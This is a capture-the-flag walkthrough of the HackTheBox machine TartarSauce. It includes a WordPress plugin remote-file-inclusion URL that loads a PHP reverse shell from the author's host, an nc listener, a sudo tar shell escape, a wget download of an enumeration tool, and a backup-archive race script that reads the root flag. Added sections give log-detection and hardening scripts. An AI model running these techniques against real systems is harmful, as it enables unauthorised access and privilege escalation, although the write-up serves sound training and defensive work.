Hello again. This time I'll walk through another HackTheBox machine: TartarSauce.
Reconnaissance
As usual, we start by scanning the target with nmap:
└─# nmap -sSCV -O -A 10.10.10.88 -T5
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-23 01:48 EST
Warning: 10.10.10.88 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.88
Host is up (0.35s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Landing Page
| http-robots.txt: 5 disallowed entries
| /webservices/tar/tar/source/
| /webservices/monstra-3.0.4/ /webservices/easy-file-uploader/
|_/webservices/developmental/ /webservices/phpmyadmin/
|_http-server-header: Apache/2.4.18 (Ubuntu)
Aggressive OS guesses: Linux 3.10 - 4.11 (95%), Linux 5.0 (94%), Linux 5.1 (94%), Linux 3.2 - 4.9 (93%), Linux 3.13 (92%), Linux 3.13 or 4.2 (92%), Linux 4.1 (92%), Linux 4.10 (92%), Linux 4.2 (92%), Linux 4.4 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 834.73 ms 10.10.14.1
2 834.81 ms 10.10.10.88
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 68.82 seconds
We can see that only port 80 is open.
Enumeration
Next we brute-force directories with gobuster.
This turns up the directory /webservices/wp, which shows a WordPress page when opened.
WordPress Scanning
We enumerate the WordPress install further with wpscan https://github.com/wpscanteam/wpscan
└─# wpscan --url http://10.10.10.88:80/webservices/wp -e ap --plugins-detection aggressive
We'll focus on the gwolle-gb plugin, whose readme still reports "Stable tag: 2.3.10".
Let's look for an exploit with searchsploit:
└─# searchsploit gwolle
------------------------------------------------------------------- -----------------------
Exploit Title | Path
------------------------------------------------------------------- -----------------------
WordPress Plugin Gwolle Guestbook 1.5.3 - Remote File Inclusion | php/webapps/38861.txt
------------------------------------------------------------------- -----------------------
Shellcodes: No Results
Initial Access
The exploit notes show we can get a reverse shell straight away by serving a PHP shell named wp-load.php. We'll do exactly that, but first copy the webshell into place:
└─# cp /usr/share/webshells/php/php-reverse-shell.php /root/latihan/tartarsauce/wp-load.php
Edit the IP and port inside it.
Then start an HTTP server to serve the file, plus a listener for the shell:
└─# nc -lvnp 1337
Next, open the URL:
http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://10.10.14.67:9898/
And the shell comes back immediately:
└─# nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.14.67] from (UNKNOWN) [10.10.10.88] 60714
Linux TartarSauce 4.15.0-041500-generic #201802011154 SMP Thu Feb 1 12:05:23 UTC 2018 i686 athlon i686 GNU/Linux
04:48:44 up 9:39, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$
Privilege Escalation (www-data → onuma)
Once we're in, we need to escalate privileges; first, spawn a proper bash shell:
$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@TartarSauce:/$
www-data@TartarSauce:/$ whoami
whoami
www-data
Enumerate our sudo rights with:
www-data@TartarSauce:/$ sudo -l
sudo -l
Matching Defaults entries for www-data on TartarSauce:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on TartarSauce:
(onuma) NOPASSWD: /bin/tar
So we can run the tar command through sudo as the user onuma.
We'll use the tar shell-escape technique from GTFOBins to get a shell as that user https://gtfobins.github.io/gtfobins/tar/
www-data@TartarSauce:/$ sudo -u onuma tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
tar: Removing leading `/' from member names
$ python -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/bash")'
onuma@TartarSauce:/$
We're now the onuma user, and with that we can grab the user flag.
onuma@TartarSauce:~$ cat user.txt
f0820eb871a7ee58............
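Both footholds above leave traces a defender can alert on: the RFI request is recorded in the Apache access log with a remote URL in the abspath parameter, and every sudo invocation, including the tar checkpoint trick, is written to auth.log with its full COMMAND= field. The script below is an added example, not part of this write-up or of the machine; it runs simple detection logic over constructed sample log lines (the IPs, hostnames and timestamps are made up) and is meant to be adapted to real log files.

```shell
#!/bin/bash
# Added example, not from the write-up: detection logic for the two techniques the
# walkthrough uses, run over constructed sample log lines embedded below.
#   1. RFI through the gwolle-gb abspath parameter: in the Apache access log the
#      request carries abspath=<scheme>://<host>, i.e. a remote URL, where the
#      plugin only ever expects a local filesystem path.
#   2. sudo-permitted tar turned into a shell: sudo logs every invocation to auth.log
#      with a COMMAND= field, so --checkpoint-action=exec in that field is the signal.
# Hosts, IPs and timestamps in the samples are constructed, not real telemetry.

# Constructed Apache combined-format access log lines.
ACCESS_LOG='10.10.14.67 - - [23/Dec/2024:04:48:40 -0500] "GET /webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://10.10.14.67:9898/ HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.10.14.12 - - [23/Dec/2024:04:50:01 -0500] "GET /webservices/wp/ HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
10.10.14.12 - - [23/Dec/2024:04:50:09 -0500] "GET /webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=/var/www/html/webservices/wp/ HTTP/1.1" 200 0 "-" "Mozilla/5.0"'

# Constructed auth.log lines in the format sudo writes through syslog.
AUTH_LOG='Dec 23 04:55:10 TartarSauce sudo: www-data : TTY=pts/0 ; PWD=/ ; USER=onuma ; COMMAND=/bin/tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
Dec 23 04:56:02 TartarSauce sudo:    onuma : TTY=pts/1 ; PWD=/home/onuma ; USER=root ; COMMAND=/bin/tar -czf /var/backups/site.tgz /var/www/html
Dec 23 04:57:30 TartarSauce sudo: www-data : TTY=pts/0 ; PWD=/ ; USER=onuma ; COMMAND=/bin/tar --checkpoint-action=exec=/bin/bash --checkpoint=1 -cf /dev/null /dev/null'

# Print access-log lines whose abspath value is a URL (plain or percent-encoded scheme).
# The third sample line passes a local path and is not flagged.
detect_rfi_requests() {
  printf '%s\n' "$1" | grep -E 'abspath=(https?|ftp)(%3[aA]|:)(%2[fF]|/){2}'
}

# Source addresses of the flagged requests, one per line.
rfi_source_ips() {
  detect_rfi_requests "$1" | cut -d' ' -f1 | sort -u
}

# Print sudo records where the command is tar with a checkpoint exec action.
# The middle sample line is an ordinary tar backup run through sudo and is not flagged.
detect_sudo_tar_checkpoint() {
  printf '%s\n' "$1" | grep -E 'sudo:.*COMMAND=(/usr)?/bin/tar .*--checkpoint-action=exec'
}

# "invoker->target" pairs for the flagged sudo records.
sudo_tar_checkpoint_actors() {
  detect_sudo_tar_checkpoint "$1" \
    | sed -nE 's|.*sudo: *([^ ]+) : .*USER=([^ ]+) ; COMMAND=.*|\1->\2|p' | sort -u
}

# Line counts, convenient for alerting thresholds.
count_rfi_requests()        { detect_rfi_requests "$1" | grep -c . || true; }
count_sudo_tar_checkpoint() { detect_sudo_tar_checkpoint "$1" | grep -c . || true; }

echo "RFI requests: $(count_rfi_requests "$ACCESS_LOG") from $(rfi_source_ips "$ACCESS_LOG" | tr '\n' ' ')"
echo "sudo tar checkpoint abuse: $(count_sudo_tar_checkpoint "$AUTH_LOG") by $(sudo_tar_checkpoint_actors "$AUTH_LOG" | tr '\n' ' ')"
```

The abspath rule deliberately matches only values that begin with a URL scheme (encoded or not), so the plugin's legitimate local-path use does not fire; the sudo rule keys on the COMMAND= field rather than the invoking user, so it also catches the same trick from any other account granted tar through sudoers.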
Privilege Escalation (onuma → root)
Next we use the LinEnum tool https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh for enumeration:
onuma@TartarSauce:/tmp$ wget http://10.10.14.67:9898/LinEnum.sh
wget http://10.10.14.67:9898/LinEnum.sh
--2024-12-23 05:05:12-- http://10.10.14.67:9898/LinEnum.sh
onuma@TartarSauce:/tmp$ ls
ls
LinEnum.sh
pspy32
systemd-private-2411860d7fc34e98be06a8f13c493560-systemd-timesyncd.service-iOxPb4
vmware-root
Make it executable, then run it:
chmod +x LinEnum.sh
./LinEnum.sh
Here we can see that a service called backuperer runs in the background:
onuma@TartarSauce:/tmp$ locate backuperer
locate backuperer
/etc/systemd/system/multi-user.target.wants/backuperer.timer
/lib/systemd/system/backuperer.service
/lib/systemd/system/backuperer.timer
/usr/sbin/backuperer
onuma@TartarSauce:/tmp$ cat /etc/systemd/system/multi-user.target.wants/backuperer.timer
[Unit]
Description=Runs backuperer every 5 mins
[Timer]
# Time to wait after booting before we run first time
OnBootSec=5min
# Time between running each consecutive time
OnUnitActiveSec=5min
Unit=backuperer.service
[Install]
WantedBy=multi-user.target
Note that backuperer runs every 5 minutes. Looking at the script itself:
onuma@TartarSauce:/tmp$ cat /usr/sbin/backuperer
cat /usr/sbin/backuperer
#!/bin/bash
#-------------------------------------------------------------------------------------
# backuperer ver 1.0.2 - by ȜӎŗgͷͼȜ
# ONUMA Dev auto backup program
# This tool will keep our webapp backed up incase another skiddie defaces us again.
# We will be able to quickly restore from a backup in seconds ;P
#-------------------------------------------------------------------------------------
# Set Vars Here
basedir=/var/www/html
bkpdir=/var/backups
tmpdir=/var/tmp
testmsg=$bkpdir/onuma_backup_test.txt
errormsg=$bkpdir/onuma_backup_error.txt
tmpfile=$tmpdir/.$(/usr/bin/head -c100 /dev/urandom |sha1sum|cut -d' ' -f1)
check=$tmpdir/check
Breaking the variables down:
basedir=/var/www/html – the web server's root directory.
bkpdir=/var/backups – the directory where backups are stored.
tmpdir=/var/tmp – the directory for temporary files.
testmsg=$bkpdir/onuma_backup_test.txt – log file for the backup test.
errormsg=$bkpdir/onuma_backup_error.txt – log file for backup errors.
tmpfile=$tmpdir/.$(/usr/bin/head -c100 /dev/urandom |sha1sum|cut -d' ' -f1) – a temporary file with a unique random name.
check=$tmpdir/check – status or marker file for the process.
We'll write a bash script that watches /var/tmp for the backup archive to appear and then modifies its contents:
#!/bin/bash
# work out of shm
cd /dev/shm
# set both start and cur equal to any backup file if it's there
start=$(find /var/tmp -maxdepth 1 -type f -name ".*")
cur=$(find /var/tmp -maxdepth 1 -type f -name ".*")
# loop until there's a change in cur
echo "Waiting for archive filename to change..."
while [ "$start" == "$cur" -o "$cur" == "" ] ; do
    sleep 10;
    cur=$(find /var/tmp -maxdepth 1 -type f -name ".*");
done
# Grab a copy of the archive
echo "File changed... copying here"
cp $cur .
# get filename
fn=$(echo $cur | cut -d'/' -f4)
# extract archive
tar -zxf $fn
# remove robots.txt and replace it with link to root.txt
rm var/www/html/robots.txt
ln -s /root/root.txt var/www/html/robots.txt
# remove old archive
rm $fn
# create new archive
tar czf $fn var
# put it back, and clean up
mv $fn $cur
rm $fn
rm -rf var
# wait for results
echo "Waiting for new logs..."
tail -f /var/backups/onuma_backup_error.txt
Download the file onto the box, move it to /dev/shm and run it:
onuma@TartarSauce:/tmp$ cp exploit.sh /dev/shm
cp exploit.sh /dev/shm
onuma@TartarSauce:/tmp$ cd /dev/shm
cd /dev/shm
onuma@TartarSauce:/dev/shm$ ls
ls
exploit.sh
onuma@TartarSauce:/dev/shm$ ./exploit.sh
./exploit.sh
Waiting for archive filename to change..
This takes a little while because we have to wait for backuperer to run; once it does, the root flag shows up in the log!
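The script above works because the backup job stages its archive in the world-writable /var/tmp, then extracts and compares it as root without checking that it is still the archive it wrote, so a swapped-in member symlink gets followed during the comparison. The following is an added example, not the machine's backuperer script: a backup/verify cycle, built under the same assumptions the walkthrough's script relies on, that closes the window by staging into a private directory, recording a SHA-256 of the archive when it is written, refusing to extract an archive whose hash has changed, and rejecting archives that carry symlink members. All paths and sample files it uses are constructed under a temporary directory.

```shell
#!/bin/bash
# Added example (not the machine's backuperer script): a backup/verify cycle that
# removes the race the walkthrough's script exploits. Assumptions: the job owns a
# private work directory (0700) instead of staging in /var/tmp, records a SHA-256
# of the archive at write time, refuses to extract an archive whose hash no longer
# matches, and rejects archives containing symlinks so a member can never point the
# later comparison at a file outside the backup tree.

# make_backup <basedir> <workdir>: archive basedir into workdir and record its hash.
make_backup() {
  local basedir=$1 workdir=$2
  ( umask 077
    tar -czf "$workdir/backup.tgz" -C "$(dirname "$basedir")" "$(basename "$basedir")"
    sha256sum "$workdir/backup.tgz" | cut -d' ' -f1 > "$workdir/backup.tgz.sha256" )
}

# archive_has_symlink <archive>: 0 if any member is a symlink (tar -tv mode column starts with l).
archive_has_symlink() {
  tar -tzvf "$1" | grep -q '^l'
}

# verify_backup <basedir> <workdir>: 0 if the archive is intact and matches basedir.
# Returns 2 on hash mismatch, 3 if the archive carries a symlink, 1 if the trees differ.
verify_backup() {
  local basedir=$1 workdir=$2 archive=$2/backup.tgz expected actual check rc
  expected=$(cat "$workdir/backup.tgz.sha256")
  actual=$(sha256sum "$archive" | cut -d' ' -f1)
  if [ "$expected" != "$actual" ]; then
    echo "refusing to extract: $archive was modified after it was written" >&2
    return 2
  fi
  if archive_has_symlink "$archive"; then
    echo "refusing to extract: $archive contains a symlink member" >&2
    return 3
  fi
  check=$(mktemp -d "$workdir/check.XXXXXX")
  tar -xzf "$archive" -C "$check"
  diff -r "$basedir" "$check/$(basename "$basedir")" >/dev/null
  rc=$?
  rm -rf "$check"
  return $rc
}

# setup_sample <root>: constructed web root, private work dir, and a file outside the backup.
setup_sample() {
  mkdir -p "$1/html" "$1/private"
  chmod 700 "$1/private"
  printf 'User-agent: *\nDisallow: /webservices/\n' > "$1/html/robots.txt"
  printf '<html>landing</html>\n' > "$1/html/index.html"
  printf 'not part of the backup\n' > "$1/outside.txt"
}

# swap_archive <root>: replace the staged archive with one whose robots.txt is a symlink,
# the substitution the walkthrough's script performs, so the checks can be shown rejecting it.
swap_archive() {
  local fake; fake=$(mktemp -d)
  cp -r "$1/html" "$fake/html"
  rm "$fake/html/robots.txt"
  ln -s "$1/outside.txt" "$fake/html/robots.txt"   # points outside the backup tree
  tar -czf "$1/private/backup.tgz" -C "$fake" html
  rm -rf "$fake"
}

# Stand-alone demonstration on constructed data.
demo_root=$(mktemp -d)
setup_sample "$demo_root"
make_backup "$demo_root/html" "$demo_root/private"
verify_backup "$demo_root/html" "$demo_root/private" && echo "intact archive: verified and compared"
swap_archive "$demo_root"
verify_backup "$demo_root/html" "$demo_root/private" 2>/dev/null || echo "swapped archive: rejected with status $?"
rm -rf "$demo_root"
```

The hash check fires first, so a swapped archive is never unpacked at all; the symlink check is a second line of defence for the case where an archive is accepted from elsewhere, and it is a cheap place to add further member-name checks (absolute paths, `..` components) if the job ever takes archives it did not create itself.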